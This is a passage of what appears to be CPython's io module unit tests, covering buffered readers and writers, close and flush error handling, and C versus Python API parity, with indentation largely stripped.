self.check_flush_error_on_close(fd, 'w')
fd = os.open(support.TESTFN, os.O_WRONLY|os.O_CREAT)
self.check_flush_error_on_close(fd, 'w', closefd=False)
os.close(fd)
def test_multi_close(self):
f = self.open(support.TESTFN, "wb", buffering=0)
f.close()
f.close()
f.close()
self.assertRaises(ValueError, f.flush)
def test_RawIOBase_read(self):
# Exercise the default RawIOBase.read() implementation (which calls
# readinto() internally).
rawio = self.MockRawIOWithoutRead((b"abc", b"d", None, b"efg", None))
self.assertEqual(rawio.read(2), b"ab")
self.assertEqual(rawio.read(2), b"c")
self.assertEqual(rawio.read(2), b"d")
self.assertEqual(rawio.read(2), None)
self.assertEqual(rawio.read(2), b"ef")
self.assertEqual(rawio.read(2), b"g")
self.assertEqual(rawio.read(2), None)
self.assertEqual(rawio.read(2), b"")
def test_types_have_dict(self):
test = (
self.IOBase(),
self.RawIOBase(),
self.TextIOBase(),
self.StringIO(),
self.BytesIO()
)
for obj in test:
self.assertTrue(hasattr(obj, "__dict__"))
def test_opener(self):
with self.open(support.TESTFN, "w") as f:
f.write("egg\n")
fd = os.open(support.TESTFN, os.O_RDONLY)
def opener(path, flags):
return fd
with self.open("non-existent", "r", opener=opener) as f:
self.assertEqual(f.read(), "egg\n")
def test_bad_opener_negative_1(self):
# Issue #27066.
def badopener(fname, flags):
return -1
with self.assertRaises(ValueError) as cm:
open('non-existent', 'r', opener=badopener)
self.assertEqual(str(cm.exception), 'opener returned -1')
def test_bad_opener_other_negative(self):
# Issue #27066.
def badopener(fname, flags):
return -2
with self.assertRaises(ValueError) as cm:
open('non-existent', 'r', opener=badopener)
self.assertEqual(str(cm.exception), 'opener returned -2')
def test_fileio_closefd(self):
# Issue #4841
with self.open(__file__, 'rb') as f1, \
self.open(__file__, 'rb') as f2:
fileio = self.FileIO(f1.fileno(), closefd=False)
# .__init__() must not close f1
fileio.__init__(f2.fileno(), closefd=False)
f1.readline()
# .close() must not close f2
fileio.close()
f2.readline()
def test_nonbuffered_textio(self):
with support.check_no_resource_warning(self):
with self.assertRaises(ValueError):
self.open(support.TESTFN, 'w', buffering=0)
def test_invalid_newline(self):
with support.check_no_resource_warning(self):
with self.assertRaises(ValueError):
self.open(support.TESTFN, 'w', newline='invalid')
def test_buffered_readinto_mixin(self):
# Test the implementation provided by BufferedIOBase
class Stream(self.BufferedIOBase):
def read(self, size):
return b"12345"
read1 = read
stream = Stream()
for method in ("readinto", "readinto1"):
with self.subTest(method):
buffer = byteslike(5)
self.assertEqual(getattr(stream, method)(buffer), 5)
self.assertEqual(bytes(buffer), b"12345")
def test_fspath_support(self):
class PathLike:
def __init__(self, path):
self.path = path
def __fspath__(self):
return self.path
def check_path_succeeds(path):
with self.open(path, "w") as f:
f.write("egg\n")
with self.open(path, "r") as f:
self.assertEqual(f.read(), "egg\n")
check_path_succeeds(PathLike(support.TESTFN))
check_path_succeeds(PathLike(support.TESTFN.encode('utf-8')))
bad_path = PathLike(TypeError)
with self.assertRaises(TypeError):
self.open(bad_path, 'w')
# ensure that refcounting is correct with some error conditions
with self.assertRaisesRegex(ValueError, 'read/write/append mode'):
self.open(PathLike(support.TESTFN), 'rwxa')
class CIOTest(IOTest):
def test_IOBase_finalize(self):
# Issue #12149: segmentation fault on _PyIOBase_finalize when both a
# class which inherits IOBase and an object of this class are caught
# in a reference cycle and close() is already in the method cache.
class MyIO(self.IOBase):
def close(self):
pass
# create an instance to populate the method cache
MyIO()
obj = MyIO()
obj.obj = obj
wr = weakref.ref(obj)
del MyIO
del obj
support.gc_collect()
self.assertIsNone(wr(), wr)
class PyIOTest(IOTest):
pass
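# Illustrative sketch (not part of the original file): IOTest only refers to the
# implementation under test through attributes such as self.open, self.FileIO or
# self.BytesIO, so the same test bodies can be reused for both implementations by
# binding each io namespace onto the corresponding subclass, roughly like the
# hypothetical helper below (the real test loader binds the full namespace).
def _bind_io_namespace(test_cls, module):
    for name in ("IOBase", "RawIOBase", "BufferedIOBase", "TextIOBase",
                 "FileIO", "BytesIO", "StringIO", "BufferedReader",
                 "BufferedWriter", "BufferedRandom", "BufferedRWPair",
                 "TextIOWrapper", "UnsupportedOperation",
                 "SEEK_CUR", "SEEK_END"):
        setattr(test_cls, name, getattr(module, name))
    # Wrap plain functions so attribute access does not turn them into bound methods.
    test_cls.open = staticmethod(module.open)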
@support.cpython_only
class APIMismatchTest(unittest.TestCase):
def test_RawIOBase_io_in_pyio_match(self):
"""Test that pyio RawIOBase class has all c RawIOBase methods"""
mismatch = support.detect_api_mismatch(pyio.RawIOBase, io.RawIOBase,
ignore=('__weakref__',))
self.assertEqual(mismatch, set(), msg='Python RawIOBase does not have all C RawIOBase methods')
def test_RawIOBase_pyio_in_io_match(self):
"""Test that c RawIOBase class has all pyio RawIOBase methods"""
mismatch = support.detect_api_mismatch(io.RawIOBase, pyio.RawIOBase)
self.assertEqual(mismatch, set(), msg='C RawIOBase does not have all Python RawIOBase methods')
class CommonBufferedTests:
# Tests common to BufferedReader, BufferedWriter and BufferedRandom
def test_detach(self):
raw = self.MockRawIO()
buf = self.tp(raw)
self.assertIs(buf.detach(), raw)
self.assertRaises(ValueError, buf.detach)
repr(buf) # Should still work
def test_fileno(self):
rawio = self.MockRawIO()
bufio = self.tp(rawio)
self.assertEqual(42, bufio.fileno())
def test_invalid_args(self):
rawio = self.MockRawIO()
bufio = self.tp(rawio)
# Invalid whence
self.assertRaises(ValueError, bufio.seek, 0, -1)
self.assertRaises(ValueError, bufio.seek, 0, 9)
def test_override_destructor(self):
tp = self.tp
record = []
class MyBufferedIO(tp):
def __del__(self):
record.append(1)
try:
f = super().__del__
except AttributeError:
pass
else:
f()
def close(self):
record.append(2)
super().close()
def flush(self):
record.append(3)
super().flush()
rawio = self.MockRawIO()
bufio = MyBufferedIO(rawio)
del bufio
support.gc_collect()
self.assertEqual(record, [1, 2, 3])
def test_context_manager(self):
# Test usability as a context manager
rawio = self.MockRawIO()
bufio = self.tp(rawio)
def _with():
with bufio:
pass
_with()
# bufio should now be closed, and using it a second time should raise
# a ValueError.
self.assertRaises(ValueError, _with)
def test_error_through_destructor(self):
# Test that the exception state is not modified by a destructor,
# even if close() fails.
rawio = self.CloseFailureIO()
def f():
self.tp(rawio).xyzzy
with support.captured_output("stderr") as s:
self.assertRaises(AttributeError, f)
s = s.getvalue().strip()
if s:
# The destructor *may* have printed an unraisable error, check it
self.assertEqual(len(s.splitlines()), 1)
self.assertTrue(s.startswith("Exception OSError: "), s)
self.assertTrue(s.endswith(" ignored"), s)
def test_repr(self):
raw = self.MockRawIO()
b = self.tp(raw)
clsname = "%s.%s" % (self.tp.__module__, self.tp.__qualname__)
self.assertEqual(repr(b), "<%s>" % clsname)
raw.name = "dummy"
self.assertEqual(repr(b), "<%s name='dummy'>" % clsname)
raw.name = b"dummy"
self.assertEqual(repr(b), "<%s name=b'dummy'>" % clsname)
def test_recursive_repr(self):
# Issue #25455
raw = self.MockRawIO()
b = self.tp(raw)
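# Note: repr() of the buffered object includes raw.name (see test_repr
# above), so pointing raw.name back at the buffered object itself makes
# repr() recurse; a RecursionError (a RuntimeError subclass) is tolerated
# below, a crash is not.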
with support.swap_attr(raw, 'name', b):
try:
repr(b) # Should not crash
except RuntimeError:
pass
def test_flush_error_on_close(self):
# Test that buffered file is closed despite failed flush
# and that flush() is called before file closed.
raw = self.MockRawIO()
closed = []
def bad_flush():
closed[:] = [b.closed, raw.closed]
raise OSError()
raw.flush = bad_flush
b = self.tp(raw)
self.assertRaises(OSError, b.close) # exception not swallowed
self.assertTrue(b.closed)
self.assertTrue(raw.closed)
self.assertTrue(closed) # flush() called
self.assertFalse(closed[0]) # flush() called before file closed
self.assertFalse(closed[1])
raw.flush = lambda: None # break reference loop
def test_close_error_on_close(self):
raw = self.MockRawIO()
def bad_flush():
raise OSError('flush')
def bad_close():
raise OSError('close')
raw.close = bad_close
b = self.tp(raw)
b.flush = bad_flush
with self.assertRaises(OSError) as err: # exception not swallowed
b.close()
self.assertEqual(err.exception.args, ('close',))
self.assertIsInstance(err.exception.__context__, OSError)
self.assertEqual(err.exception.__context__.args, ('flush',))
self.assertFalse(b.closed)
def test_nonnormalized_close_error_on_close(self):
# Issue #21677
raw = self.MockRawIO()
def bad_flush():
raise non_existing_flush
def bad_close():
raise non_existing_close
raw.close = bad_close
b = self.tp(raw)
b.flush = bad_flush
with self.assertRaises(NameError) as err: # exception not swallowed
b.close()
self.assertIn('non_existing_close', str(err.exception))
self.assertIsInstance(err.exception.__context__, NameError)
self.assertIn('non_existing_flush', str(err.exception.__context__))
self.assertFalse(b.closed)
def test_multi_close(self):
raw = self.MockRawIO()
b = self.tp(raw)
b.close()
b.close()
b.close()
self.assertRaises(ValueError, b.flush)
def test_unseekable(self):
bufio = self.tp(self.MockUnseekableIO(b"A" * 10))
self.assertRaises(self.UnsupportedOperation, bufio.tell)
self.assertRaises(self.UnsupportedOperation, bufio.seek, 0)
def test_readonly_attributes(self):
raw = self.MockRawIO()
buf = self.tp(raw)
x = self.MockRawIO()
with self.assertRaises(AttributeError):
buf.raw = x
class SizeofTest:
@support.cpython_only
def test_sizeof(self):
bufsize1 = 4096
bufsize2 = 8192
rawio = self.MockRawIO()
bufio = self.tp(rawio, buffer_size=bufsize1)
size = sys.getsizeof(bufio) - bufsize1
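# "size" is the object's overhead without its internal buffer; the same
# overhead, plus the new buffer size, should be reported for a buffer of
# a different size below.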
rawio = self.MockRawIO()
bufio = self.tp(rawio, buffer_size=bufsize2)
self.assertEqual(sys.getsizeof(bufio), size + bufsize2)
@support.cpython_only
def test_buffer_freeing(self):
bufsize = 4096
rawio = self.MockRawIO()
bufio = self.tp(rawio, buffer_size=bufsize)
size = sys.getsizeof(bufio) - bufsize
bufio.close()
self.assertEqual(sys.getsizeof(bufio), size)
class BufferedReaderTest(unittest.TestCase, CommonBufferedTests):
read_mode = "rb"
def test_constructor(self):
rawio = self.MockRawIO([b"abc"])
bufio = self.tp(rawio)
bufio.__init__(rawio)
bufio.__init__(rawio, buffer_size=1024)
bufio.__init__(rawio, buffer_size=16)
self.assertEqual(b"abc", bufio.read())
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=0)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-16)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-1)
rawio = self.MockRawIO([b"abc"])
bufio.__init__(rawio)
self.assertEqual(b"abc", bufio.read())
def test_uninitialized(self):
bufio = self.tp.__new__(self.tp)
del bufio
bufio = self.tp.__new__(self.tp)
self.assertRaisesRegex((ValueError, AttributeError),
'uninitialized|has no attribute',
bufio.read, 0)
bufio.__init__(self.MockRawIO())
self.assertEqual(bufio.read(0), b'')
def test_read(self):
for arg in (None, 7):
rawio = self.MockRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
self.assertEqual(b"abcdefg", bufio.read(arg))
# Invalid args
self.assertRaises(ValueError, bufio.read, -2)
def test_read1(self):
rawio = self.MockRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
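# Note: read1() serves data from the internal buffer when available and
# performs at most one raw read otherwise, which is why rawio._reads only
# advances below once the buffered chunk has been exhausted.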
self.assertEqual(b"a", bufio.read(1))
self.assertEqual(b"b", bufio.read1(1))
self.assertEqual(rawio._reads, 1)
self.assertEqual(b"", bufio.read1(0))
self.assertEqual(b"c", bufio.read1(100))
self.assertEqual(rawio._reads, 1)
self.assertEqual(b"d", bufio.read1(100))
self.assertEqual(rawio._reads, 2)
self.assertEqual(b"efg", bufio.read1(100))
self.assertEqual(rawio._reads, 3)
self.assertEqual(b"", bufio.read1(100))
self.assertEqual(rawio._reads, 4)
def test_read1_arbitrary(self):
rawio = self.MockRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
self.assertEqual(b"a", bufio.read(1))
self.assertEqual(b"bc", bufio.read1())
self.assertEqual(b"d", bufio.read1())
self.assertEqual(b"efg", bufio.read1(-1))
self.assertEqual(rawio._reads, 3)
self.assertEqual(b"", bufio.read1())
self.assertEqual(rawio._reads, 4)
def test_readinto(self):
rawio = self.MockRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
b = bytearray(2)
self.assertEqual(bufio.readinto(b), 2)
self.assertEqual(b, b"ab")
self.assertEqual(bufio.readinto(b), 2)
self.assertEqual(b, b"cd")
self.assertEqual(bufio.readinto(b), 2)
self.assertEqual(b, b"ef")
self.assertEqual(bufio.readinto(b), 1)
self.assertEqual(b, b"gf")
self.assertEqual(bufio.readinto(b), 0)
self.assertEqual(b, b"gf")
rawio = self.MockRawIO((b"abc", None))
bufio = self.tp(rawio)
self.assertEqual(bufio.readinto(b), 2)
self.assertEqual(b, b"ab")
self.assertEqual(bufio.readinto(b), 1)
self.assertEqual(b, b"cb")
def test_readinto1(self):
buffer_size = 10
rawio = self.MockRawIO((b"abc", b"de", b"fgh", b"jkl"))
bufio = self.tp(rawio, buffer_size=buffer_size)
b = bytearray(2)
self.assertEqual(bufio.peek(3), b'abc')
self.assertEqual(rawio._reads, 1)
self.assertEqual(bufio.readinto1(b), 2)
self.assertEqual(b, b"ab")
self.assertEqual(rawio._reads, 1)
self.assertEqual(bufio.readinto1(b), 1)
self.assertEqual(b[:1], b"c")
self.assertEqual(rawio._reads, 1)
self.assertEqual(bufio.readinto1(b), 2)
self.assertEqual(b, b"de")
self.assertEqual(rawio._reads, 2)
b = bytearray(2*buffer_size)
self.assertEqual(bufio.peek(3), b'fgh')
self.assertEqual(rawio._reads, 3)
self.assertEqual(bufio.readinto1(b), 6)
self.assertEqual(b[:6], b"fghjkl")
self.assertEqual(rawio._reads, 4)
def test_readinto_array(self):
buffer_size = 60
data = b"a" * 26
rawio = self.MockRawIO((data,))
bufio = self.tp(rawio, buffer_size=buffer_size)
# Create an array with element size > 1 byte
b = array.array('i', b'x' * 32)
assert len(b) != 16
# Read into it. We should get as many *bytes* as we can fit into b
# (which is more than the number of elements)
n = bufio.readinto(b)
self.assertGreater(n, len(b))
# Check that old contents of b are preserved
bm = memoryview(b).cast('B')
self.assertLess(n, len(bm))
self.assertEqual(bm[:n], data[:n])
self.assertEqual(bm[n:], b'x' * (len(bm[n:])))
def test_readinto1_array(self):
buffer_size = 60
data = b"a" * 26
rawio = self.MockRawIO((data,))
bufio = self.tp(rawio, buffer_size=buffer_size)
# Create an array with element size > 1 byte
b = array.array('i', b'x' * 32)
assert len(b) != 16
# Read into it. We should get as many *bytes* as we can fit into b
# (which is more than the number of elements)
n = bufio.readinto1(b)
self.assertGreater(n, len(b))
# Check that old contents of b are preserved
bm = memoryview(b).cast('B')
self.assertLess(n, len(bm))
self.assertEqual(bm[:n], data[:n])
self.assertEqual(bm[n:], b'x' * (len(bm[n:])))
def test_readlines(self):
def bufio():
rawio = self.MockRawIO((b"abc\n", b"d\n", b"ef"))
return self.tp(rawio)
self.assertEqual(bufio().readlines(), [b"abc\n", b"d\n", b"ef"])
self.assertEqual(bufio().readlines(5), [b"abc\n", b"d\n"])
self.assertEqual(bufio().readlines(None), [b"abc\n", b"d\n", b"ef"])
def test_buffering(self):
data = b"abcdefghi"
dlen = len(data)
tests = [
[ 100, [ 3, 1, 4, 8 ], [ dlen, 0 ] ],
[ 100, [ 3, 3, 3], [ dlen ] ],
[ 4, [ 1, 2, 4, 2 ], [ 4, 4, 1 ] ],
]
for bufsize, buf_read_sizes, raw_read_sizes in tests:
rawio = self.MockFileIO(data)
bufio = self.tp(rawio, buffer_size=bufsize)
pos = 0
for nbytes in buf_read_sizes:
self.assertEqual(bufio.read(nbytes), data[pos:pos+nbytes])
pos += nbytes
# this is mildly implementation-dependent
self.assertEqual(rawio.read_history, raw_read_sizes)
def test_read_non_blocking(self):
# Inject some None's in there to simulate EWOULDBLOCK
rawio = self.MockRawIO((b"abc", b"d", None, b"efg", None, None, None))
bufio = self.tp(rawio)
self.assertEqual(b"abcd", bufio.read(6))
self.assertEqual(b"e", bufio.read(1))
self.assertEqual(b"fg", bufio.read())
self.assertEqual(b"", bufio.peek(1))
self.assertIsNone(bufio.read())
self.assertEqual(b"", bufio.read())
rawio = self.MockRawIO((b"a", None, None))
self.assertEqual(b"a", rawio.readall())
self.assertIsNone(rawio.readall())
def test_read_past_eof(self):
rawio = self.MockRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
self.assertEqual(b"abcdefg", bufio.read(9000))
def test_read_all(self):
rawio = self.MockRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
self.assertEqual(b"abcdefg", bufio.read())
@unittest.skipUnless(threading, 'Threading required for this test.')
@support.requires_resource('cpu')
def test_threads(self):
try:
# Write out many bytes with exactly the same number of 0's,
# 1's... 255's. This will help us check that concurrent reading
# doesn't duplicate or forget contents.
N = 1000
l = list(range(256)) * N
random.shuffle(l)
s = bytes(bytearray(l))
with self.open(support.TESTFN, "wb") as f:
f.write(s)
with self.open(support.TESTFN, self.read_mode, buffering=0) as raw:
bufio = self.tp(raw, 8)
errors = []
results = []
def f():
try:
# Intra-buffer read then buffer-flushing read
for n in cycle([1, 19]):
s = bufio.read(n)
if not s:
break
# list.append() is atomic
results.append(s)
except Exception as e:
errors.append(e)
raise
threads = [threading.Thread(target=f) for x in range(20)]
with support.start_threads(threads):
time.sleep(0.02) # yield
self.assertFalse(errors,
"the following exceptions were caught: %r" % errors)
s = b''.join(results)
for i in range(256):
c = bytes(bytearray([i]))
self.assertEqual(s.count(c), N)
finally:
support.unlink(support.TESTFN)
def test_unseekable(self):
bufio = self.tp(self.MockUnseekableIO(b"A" * 10))
self.assertRaises(self.UnsupportedOperation, bufio.tell)
self.assertRaises(self.UnsupportedOperation, bufio.seek, 0)
bufio.read(1)
self.assertRaises(self.UnsupportedOperation, bufio.seek, 0)
self.assertRaises(self.UnsupportedOperation, bufio.tell)
def test_misbehaved_io(self):
rawio = self.MisbehavedRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
self.assertRaises(OSError, bufio.seek, 0)
self.assertRaises(OSError, bufio.tell)
def test_no_extraneous_read(self):
# Issue #9550; when the raw IO object has satisfied the read request,
# we should not issue any additional reads, otherwise it may block
# (e.g. socket).
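# (_extraneous_reads, as relied on here, is assumed to count raw reads
# issued after the mock's read data has been exhausted.)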
bufsize = 16
for n in (2, bufsize - 1, bufsize, bufsize + 1, bufsize * 2):
rawio = self.MockRawIO([b"x" * n])
bufio = self.tp(rawio, bufsize)
self.assertEqual(bufio.read(n), b"x" * n)
# Simple case: one raw read is enough to satisfy the request.
self.assertEqual(rawio._extraneous_reads, 0,
"failed for {}: {} != 0".format(n, rawio._extraneous_reads))
# A more complex case where two raw reads are needed to satisfy
# the request.
rawio = self.MockRawIO([b"x" * (n - 1), b"x"])
bufio = self.tp(rawio, bufsize)
self.assertEqual(bufio.read(n), b"x" * n)
self.assertEqual(rawio._extraneous_reads, 0,
"failed for {}: {} != 0".format(n, rawio._extraneous_reads))
def test_read_on_closed(self):
# Issue #23796
b = io.BufferedReader(io.BytesIO(b"12"))
b.read(1)
b.close()
self.assertRaises(ValueError, b.peek)
self.assertRaises(ValueError, b.read1, 1)
class CBufferedReaderTest(BufferedReaderTest, SizeofTest):
tp = io.BufferedReader
def test_constructor(self):
BufferedReaderTest.test_constructor(self)
# The allocation can succeed on 32-bit builds, e.g. with more
# than 2GB RAM and a 64-bit kernel.
if sys.maxsize > 0x7FFFFFFF:
rawio = self.MockRawIO()
bufio = self.tp(rawio)
self.assertRaises((OverflowError, MemoryError, ValueError),
bufio.__init__, rawio, sys.maxsize)
def test_initialization(self):
rawio = self.MockRawIO([b"abc"])
bufio = self.tp(rawio)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=0)
self.assertRaises(ValueError, bufio.read)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-16)
self.assertRaises(ValueError, bufio.read)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-1)
self.assertRaises(ValueError, bufio.read)
def test_misbehaved_io_read(self):
rawio = self.MisbehavedRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
# _pyio.BufferedReader seems to implement reading differently, so
# checking this is not so easy.
self.assertRaises(OSError, bufio.read, 10)
def test_garbage_collection(self):
# C BufferedReader objects are collected.
# The Python version has __del__, so it ends up in gc.garbage instead
with support.check_warnings(('', ResourceWarning)):
rawio = self.FileIO(support.TESTFN, "w+b")
f = self.tp(rawio)
f.f = f
wr = weakref.ref(f)
del f
support.gc_collect()
self.assertIsNone(wr(), wr)
def test_args_error(self):
# Issue #17275
with self.assertRaisesRegex(TypeError, "BufferedReader"):
self.tp(io.BytesIO(), 1024, 1024, 1024)
class PyBufferedReaderTest(BufferedReaderTest):
tp = pyio.BufferedReader
class BufferedWriterTest(unittest.TestCase, CommonBufferedTests):
write_mode = "wb"
def test_constructor(self):
rawio = self.MockRawIO()
bufio = self.tp(rawio)
bufio.__init__(rawio)
bufio.__init__(rawio, buffer_size=1024)
bufio.__init__(rawio, buffer_size=16)
self.assertEqual(3, bufio.write(b"abc"))
bufio.flush()
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=0)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-16)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-1)
bufio.__init__(rawio)
self.assertEqual(3, bufio.write(b"ghi"))
bufio.flush()
self.assertEqual(b"".join(rawio._write_stack), b"abcghi")
def test_uninitialized(self):
bufio = self.tp.__new__(self.tp)
del bufio
bufio = self.tp.__new__(self.tp)
self.assertRaisesRegex((ValueError, AttributeError),
'uninitialized|has no attribute',
bufio.write, b'')
bufio.__init__(self.MockRawIO())
self.assertEqual(bufio.write(b''), 0)
def test_detach_flush(self):
raw = self.MockRawIO()
buf = self.tp(raw)
buf.write(b"howdy!")
self.assertFalse(raw._write_stack)
buf.detach()
self.assertEqual(raw._write_stack, [b"howdy!"])
def test_write(self):
# Write to the buffered IO but don't overflow the buffer.
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
bufio.write(b"abc")
self.assertFalse(writer._write_stack)
buffer = bytearray(b"def")
bufio.write(buffer)
buffer[:] = b"***" # Overwrite our copy of the data
bufio.flush()
self.assertEqual(b"".join(writer._write_stack), b"abcdef")
def test_write_overflow(self):
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
contents = b"abcdefghijklmnop"
for n in range(0, len(contents), 3):
bufio.write(contents[n:n+3])
flushed = b"".join(writer._write_stack)
# At least (total - 8) bytes were implicitly flushed, perhaps more
# depending on the implementation.
self.assertTrue(flushed.startswith(contents[:-8]), flushed)
def check_writes(self, intermediate_func):
# Lots of writes, test the flushed output is as expected.
contents = bytes(range(256)) * 1000
n = 0
writer = self.MockRawIO()
bufio = self.tp(writer, 13)
# Generator of write sizes: repeat each N 15 times then proceed to N+1
def gen_sizes():
for size in count(1):
for i in range(15):
yield size
sizes = gen_sizes()
while n < len(contents):
size = min(next(sizes), len(contents) - n)
self.assertEqual(bufio.write(contents[n:n+size]), size)
intermediate_func(bufio)
n += size
bufio.flush()
self.assertEqual(contents, b"".join(writer._write_stack))
def test_writes(self):
self.check_writes(lambda bufio: None)
def test_writes_and_flushes(self):
self.check_writes(lambda bufio: bufio.flush())
def test_writes_and_seeks(self):
def _seekabs(bufio):
pos = bufio.tell()
bufio.seek(pos + 1, 0)
bufio.seek(pos - 1, 0)
bufio.seek(pos, 0)
self.check_writes(_seekabs)
def _seekrel(bufio):
pos = bufio.seek(0, 1)
bufio.seek(+1, 1)
bufio.seek(-1, 1)
bufio.seek(pos, 0)
self.check_writes(_seekrel)
def test_writes_and_truncates(self):
self.check_writes(lambda bufio: bufio.truncate(bufio.tell()))
def test_write_non_blocking(self):
raw = self.MockNonBlockWriterIO()
bufio = self.tp(raw, 8)
self.assertEqual(bufio.write(b"abcd"), 4)
self.assertEqual(bufio.write(b"efghi"), 5)
# 1 byte will be written, the rest will be buffered
raw.block_on(b"k")
self.assertEqual(bufio.write(b"jklmn"), 5)
# Of the 18 new bytes, 8 will be written, 8 will be buffered and the last 2 will be lost
raw.block_on(b"0")
try:
bufio.write(b"opqrwxyz0123456789")
except self.BlockingIOError as e:
written = e.characters_written
else:
self.fail("BlockingIOError should have been raised")
self.assertEqual(written, 16)
self.assertEqual(raw.pop_written(),
b"abcdefghijklmnopqrwxyz")
self.assertEqual(bufio.write(b"ABCDEFGHI"), 9)
s = raw.pop_written()
# Previously buffered bytes were flushed
self.assertTrue(s.startswith(b"01234567A"), s)
def test_write_and_rewind(self):
raw = io.BytesIO()
bufio = self.tp(raw, 4)
self.assertEqual(bufio.write(b"abcdef"), 6)
self.assertEqual(bufio.tell(), 6)
bufio.seek(0, 0)
self.assertEqual(bufio.write(b"XY"), 2)
bufio.seek(6, 0)
self.assertEqual(raw.getvalue(), b"XYcdef")
self.assertEqual(bufio.write(b"123456"), 6)
bufio.flush()
self.assertEqual(raw.getvalue(), b"XYcdef123456")
def test_flush(self):
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
bufio.write(b"abc")
bufio.flush()
self.assertEqual(b"abc", writer._write_stack[0])
def test_writelines(self):
l = [b'ab', b'cd', b'ef']
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
bufio.writelines(l)
bufio.flush()
self.assertEqual(b''.join(writer._write_stack), b'abcdef')
def test_writelines_userlist(self):
l = UserList([b'ab', b'cd', b'ef'])
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
bufio.writelines(l)
bufio.flush()
self.assertEqual(b''.join(writer._write_stack), b'abcdef')
def test_writelines_error(self):
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
self.assertRaises(TypeError, bufio.writelines, [1, 2, 3])
self.assertRaises(TypeError, bufio.writelines, None)
self.assertRaises(TypeError, bufio.writelines, 'abc')
def test_destructor(self):
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
bufio.write(b"abc")
del bufio
support.gc_collect()
self.assertEqual(b"abc", writer._write_stack[0])
def test_truncate(self):
# Truncate implicitly flushes the buffer.
with self.open(support.TESTFN, self.write_mode, buffering=0) as raw:
bufio = self.tp(raw, 8)
bufio.write(b"abcdef")
self.assertEqual(bufio.truncate(3), 3)
self.assertEqual(bufio.tell(), 6)
with self.open(support.TESTFN, "rb", buffering=0) as f:
self.assertEqual(f.read(), b"abc")
@unittest.skipUnless(threading, 'Threading required for this test.')
@support.requires_resource('cpu')
def test_threads(self):
try:
# Write out many bytes from many threads and test they were
# all flushed.
N = 1000
contents = bytes(range(256)) * N
sizes = cycle([1, 19])
n = 0
queue = deque()
while n < len(contents):
size = next(sizes)
queue.append(contents[n:n+size])
n += size
del contents
# We use a real file object because it allows us to
# exercise situations where the GIL is released before
# writing the buffer to the raw streams. This is in addition
# to concurrency issues due to switching threads in the middle
# of Python code.
with self.open(support.TESTFN, self.write_mode, buffering=0) as raw:
bufio = self.tp(raw, 8)
errors = []
def f():
try:
while True:
try:
s = queue.popleft()
except IndexError:
return
bufio.write(s)
except Exception as e:
errors.append(e)
raise
threads = [threading.Thread(target=f) for x in range(20)]
with support.start_threads(threads):
time.sleep(0.02) # yield
self.assertFalse(errors,
"the following exceptions were caught: %r" % errors)
bufio.close()
with self.open(support.TESTFN, "rb") as f:
s = f.read()
for i in range(256):
self.assertEqual(s.count(bytes([i])), N)
finally:
support.unlink(support.TESTFN)
def test_misbehaved_io(self):
rawio = self.MisbehavedRawIO()
bufio = self.tp(rawio, 5)
self.assertRaises(OSError, bufio.seek, 0)
self.assertRaises(OSError, bufio.tell)
self.assertRaises(OSError, bufio.write, b"abcdef")
def test_max_buffer_size_removal(self):
with self.assertRaises(TypeError):
self.tp(self.MockRawIO(), 8, 12)
def test_write_error_on_close(self):
raw = self.MockRawIO()
def bad_write(b):
raise OSError()
raw.write = bad_write
b = self.tp(raw)
b.write(b'spam')
self.assertRaises(OSError, b.close) # exception not swallowed
self.assertTrue(b.closed)
class CBufferedWriterTest(BufferedWriterTest, SizeofTest):
tp = io.BufferedWriter
def test_constructor(self):
BufferedWriterTest.test_constructor(self)
# The allocation can succeed on 32-bit builds, e.g. with more
# than 2GB RAM and a 64-bit kernel.
if sys.maxsize > 0x7FFFFFFF:
rawio = self.MockRawIO()
bufio = self.tp(rawio)
self.assertRaises((OverflowError, MemoryError, ValueError),
bufio.__init__, rawio, sys.maxsize)
def test_initialization(self):
rawio = self.MockRawIO()
bufio = self.tp(rawio)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=0)
self.assertRaises(ValueError, bufio.write, b"def")
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-16)
self.assertRaises(ValueError, bufio.write, b"def")
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-1)
self.assertRaises(ValueError, bufio.write, b"def")
def test_garbage_collection(self):
# C BufferedWriter objects are collected, and collecting them flushes
# all data to disk.
# The Python version has __del__, so it ends up in gc.garbage instead
with support.check_warnings(('', ResourceWarning)):
rawio = self.FileIO(support.TESTFN, "w+b")
f = self.tp(rawio)
f.write(b"123xxx")
f.x = f
wr = weakref.ref(f)
del f
support.gc_collect()
self.assertIsNone(wr(), wr)
with self.open(support.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"123xxx")
def test_args_error(self):
# Issue #17275
with self.assertRaisesRegex(TypeError, "BufferedWriter"):
self.tp(io.BytesIO(), 1024, 1024, 1024)
class PyBufferedWriterTest(BufferedWriterTest):
tp = pyio.BufferedWriter
class BufferedRWPairTest(unittest.TestCase):
def test_constructor(self):
pair = self.tp(self.MockRawIO(), self.MockRawIO())
self.assertFalse(pair.closed)
def test_uninitialized(self):
pair = self.tp.__new__(self.tp)
del pair
pair = self.tp.__new__(self.tp)
self.assertRaisesRegex((ValueError, AttributeError),
